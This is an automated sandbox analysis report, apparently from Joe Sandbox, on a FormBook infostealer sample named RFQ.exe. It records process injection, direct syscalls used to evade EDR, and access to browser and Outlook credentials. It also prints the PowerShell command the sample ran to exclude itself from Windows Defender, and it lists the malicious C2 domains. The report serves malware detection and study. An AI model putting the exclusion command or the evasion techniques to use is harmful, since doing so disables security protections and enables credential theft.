            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01B008C0 mov eax, dword ptr fs:[00000030h]5_2_01B008C0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov ecx, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A52835 mov eax, dword ptr fs:[00000030h]5_2_01A52835
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A6A830 mov eax, dword ptr fs:[00000030h]5_2_01A6A830
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD483A mov eax, dword ptr fs:[00000030h]5_2_01AD483A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AD483A mov eax, dword ptr fs:[00000030h]5_2_01AD483A
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABC810 mov eax, dword ptr fs:[00000030h]5_2_01ABC810
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE872 mov eax, dword ptr fs:[00000030h]5_2_01ABE872
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABE872 mov eax, dword ptr fs:[00000030h]5_2_01ABE872
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6870 mov eax, dword ptr fs:[00000030h]5_2_01AC6870
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AC6870 mov eax, dword ptr fs:[00000030h]5_2_01AC6870
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A42840 mov ecx, dword ptr fs:[00000030h]5_2_01A42840
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A60854 mov eax, dword ptr fs:[00000030h]5_2_01A60854
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34859 mov eax, dword ptr fs:[00000030h]5_2_01A34859
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A34859 mov eax, dword ptr fs:[00000030h]5_2_01A34859
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40BBE mov eax, dword ptr fs:[00000030h]5_2_01A40BBE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A40BBE mov eax, dword ptr fs:[00000030h]5_2_01A40BBE
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4BB0 mov eax, dword ptr fs:[00000030h]5_2_01AE4BB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01AE4BB0 mov eax, dword ptr fs:[00000030h]5_2_01AE4BB0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A38BF0 mov eax, dword ptr fs:[00000030h]5_2_01A38BF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EBFC mov eax, dword ptr fs:[00000030h]5_2_01A5EBFC
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ABCBF0 mov eax, dword ptr fs:[00000030h]5_2_01ABCBF0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A50BCB mov eax, dword ptr fs:[00000030h]5_2_01A50BCB
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A30BCD mov eax, dword ptr fs:[00000030h]5_2_01A30BCD
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01ADEBD0 mov eax, dword ptr fs:[00000030h]5_2_01ADEBD0
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EB20 mov eax, dword ptr fs:[00000030h]5_2_01A5EB20
            Source: C:\Users\user\Desktop\RFQ.exeCode function: 5_2_01A5EB20 mov eax, dword ptr fs:[00000030h]5_2_01A5EB20
            Source: C:\Users\user\Desktop\RFQ.exe - Process token adjusted: Debug
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process token adjusted: Debug
            Source: C:\Users\user\Desktop\RFQ.exe - Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\RFQ.exe - Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
                NtAllocateVirtualMemory: Direct from: 0x76EF48EC
                NtQueryAttributesFile: Direct from: 0x76EF2E6C
                NtQueryVolumeInformationFile: Direct from: 0x76EF2F2C
                NtQuerySystemInformation: Direct from: 0x76EF48CC
                NtOpenSection: Direct from: 0x76EF2E0C
                NtDeviceIoControlFile: Direct from: 0x76EF2AEC
                NtAllocateVirtualMemory: Direct from: 0x76EF2BEC
                NtQueryInformationToken: Direct from: 0x76EF2CAC
                NtCreateFile: Direct from: 0x76EF2FEC
                NtOpenFile: Direct from: 0x76EF2DCC
                NtTerminateThread: Direct from: 0x76EF2FCC
                NtOpenKeyEx: Direct from: 0x76EF2B9C
                NtSetInformationProcess: Direct from: 0x76EF2C5C
                NtProtectVirtualMemory: Direct from: 0x76EF2F9C
                NtWriteVirtualMemory: Direct from: 0x76EF2E3C
                NtNotifyChangeKey: Direct from: 0x76EF3C2C
                NtCreateMutant: Direct from: 0x76EF35CC
                NtResumeThread: Direct from: 0x76EF36AC
                NtMapViewOfSection: Direct from: 0x76EF2D1C
                NtProtectVirtualMemory: Direct from: 0x76EE7B2E
                NtAllocateVirtualMemory: Direct from: 0x76EF2BFC
                NtQuerySystemInformation: Direct from: 0x76EF2DFC
                NtReadFile: Direct from: 0x76EF2ADC
                NtDelayExecution: Direct from: 0x76EF2DDC
                NtQueryInformationProcess: Direct from: 0x76EF2C26
                NtResumeThread: Direct from: 0x76EF2FBC
                NtCreateUserProcess: Direct from: 0x76EF371C
                NtAllocateVirtualMemory: Direct from: 0x76EF3C9C
                NtWriteVirtualMemory: Direct from: 0x76EF490C
                NtSetInformationThread: Direct from: 0x76EE63F9
                NtClose: Direct from: 0x76EF2B6C
                NtSetInformationThread: Direct from: 0x76EF2B4C
                NtReadVirtualMemory: Direct from: 0x76EF2E8C
                NtCreateKey: Direct from: 0x76EF2C6C
            Source: C:\Users\user\Desktop\RFQ.exe - Memory written: C:\Users\user\Desktop\RFQ.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\RFQ.exe - Section loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\RFQ.exe - Section loaded: NULL target: C:\Windows\SysWOW64\icacls.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\icacls.exe - Section loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: read write
            Source: C:\Windows\SysWOW64\icacls.exe - Section loaded: NULL target: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\icacls.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\icacls.exe - Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\icacls.exe - Thread register set: target process: 1308
            Source: C:\Windows\SysWOW64\icacls.exe - Thread APC queued: target process: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe
            Source: C:\Users\user\Desktop\RFQ.exe - Process created: C:\Users\user\Desktop\RFQ.exe "C:\Users\user\Desktop\RFQ.exe"
            Source: C:\Program Files (x86)\RVvmUvPEqDlYrrweVNYYJuvQHghwCDqplNswxbXNeTxKBBugQnGCMhEbIeudCHnXDjdBoYZ\KdNqCjDpwdLOuI.exe - Process created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\SysWOW64\icacls.exe"
            Source: C:\Windows\SysWOW64\icacls.exe - Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: KdNqCjDpwdLOuI.exe, 00000007.00000002.4431534206.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 00000007.00000000.2074986822.0000000001011000.00000002.00000001.00040000.00000000.sdmp, KdNqCjDpwdLOuI.exe, 0000000A.00000000.2221080731.00000000012A1000.00000002.00000001.00040000.00000000.sdmp
                Binary or memory string: Program Manager
                Binary or memory string: Shell_TrayWnd
                Binary or memory string: Progman
                Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\RFQ.exe
                Queries volume information: C:\Users\user\Desktop\RFQ.exe VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Queries volume information: C:\ VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Users\user\Desktop\RFQ.exe - Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information

            Source: Yara match
                File source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\icacls.exe
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
                File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
                File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            Source: Yara match
                File source: 5.2.RFQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                File source: 5.2.RFQ.exe.400000.0.unpack, type: UNPACKEDPE
                File source: 00000005.00000002.2157037276.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2157544338.0000000001920000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4432058562.0000000003690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4432005342.0000000003650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                File source: 0000000A.00000002.4433484681.0000000005010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000005.00000002.2158404724.0000000002750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                File source: 00000007.00000002.4431863732.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | [1] Services File Permissions Weakness | [412] Process Injection | [1] Masquerading | [1] OS Credential Dumping | [21] Security Software Discovery | Remote Services | [1] Email Collection | [1] Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | [1] DLL Side-Loading | [1] Abuse Elevation Control Mechanism | [11] Disable or Modify Tools | LSASS Memory | [2] Process Discovery | Remote Desktop Protocol | [1] Archive Collected Data | [3] Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | [1] Services File Permissions Weakness | [41] Virtualization/Sandbox Evasion | Security Account Manager | [41] Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | [1] Data from Local System | [4] Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | [1] DLL Side-Loading | [412] Process Injection | NTDS | [1] Application Window Discovery | Distributed Component Object Model | Input Capture | [4] Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | [1] Deobfuscate/Decode Files or Information | LSA Secrets | [2] File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | [1] Abuse Elevation Control Mechanism | Cached Domain Credentials | [13] System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | [4] Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | [1] Services File Permissions Weakness | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | [12] Software Packing | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | [1] DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph
ID: 1426618, Sample: RFQ.exe, Startdate: 16/04/2024, Architecture: WINDOWS, Score: 100

Sample-level signatures:
• Malicious sample detected (through community Yara rule)
• Multi AV Scanner detection for submitted file
• Yara detected FormBook
• 6 other signatures

Sample-level DNS/IP info:
• www.fusionndustries.xyz
• www.book-of-degen.xyz (signature: Performs DNS queries to domains with low reputation)
• 16 other IPs or domains

Process tree:
• RFQ.exe (started)
  Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • RFQ.exe (started)
    Signatures: Maps a DLL or memory area into another process
    • KdNqCjDpwdLOuI.exe (injected)
      Signatures: Found direct / indirect Syscall (likely to bypass EDR)
      • icacls.exe (started)
        Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
        • KdNqCjDpwdLOuI.exe (injected)
          Signatures: Found direct / indirect Syscall (likely to bypass EDR)
          DNS/IP info: www.fusionndustries.xyz 203.161.50.128, 49744, 49745, 49746 VNPT-AS-VNVNPTCorpVN Malaysia; www.book-of-degen.xyz 75.2.60.5, 49740, 49741, 49742 AMAZON-02US United States; 8 other IPs or domains
        • firefox.exe (started)
  • powershell.exe (started)
    Signatures: Loading BitLocker PowerShell Module
    • WmiPrvSE.exe (started)
    • conhost.exe (started)

Source | Detection | Scanner
RFQ.exe | 29% | Virustotal
RFQ.exe | 18% | ReversingLabs
RFQ.exe | 100% | Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1426618
Start date and time: 2024-04-16 11:58:06 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 12m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: RFQ.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@11/7@24/10
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 89%
• Number of executed functions: 129
• Number of non-executed functions: 293
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes where analyzed, report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
11:58:53 | API Interceptor | 1x Sleep call for process: RFQ.exe modified
11:58:55 | API Interceptor | 13x Sleep call for process: powershell.exe modified
11:59:47 | API Interceptor | 15434762x Sleep call for process: icacls.exe modified
                                                                                                      No context
                                                                                                      No context
                                                                                                      Process:C:\Users\user\Desktop\RFQ.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1216
                                                                                                      Entropy (8bit):5.34331486778365
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                      MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                      SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                      SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                      SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2232
                                                                                                      Entropy (8bit):5.380805901110357
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:lylWSU4xympjgs4Rc9tEoUl8NPZHUl7u1iMugeC/ZM0Uyus:lGLHxvCsIcnSKRHmOugw1s
                                                                                                      MD5:19032BC6BBC2FC23A3E7E1C2829CD2C3
                                                                                                      SHA1:8403CE1FBD50E9B8E12184D3D574288C79720DA7
                                                                                                      SHA-256:E0DFD190CCB48CD1607F5FEA0D25EB839CF1894FCCA9DA90E8E088AA95AF84BA
                                                                                                      SHA-512:80FBB10C36F46447CEE12D552BF769007B2D03E8B232B13A9F3267378C9B735F45C31BDEDF8E7066507361275414855DD445064D7FF8726E1BC20F19417D7AF5
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<...............V.}...@...i...........System.Transactions.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                      Process:C:\Windows\SysWOW64\icacls.exe
                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196608
                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                      Malicious:false
                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
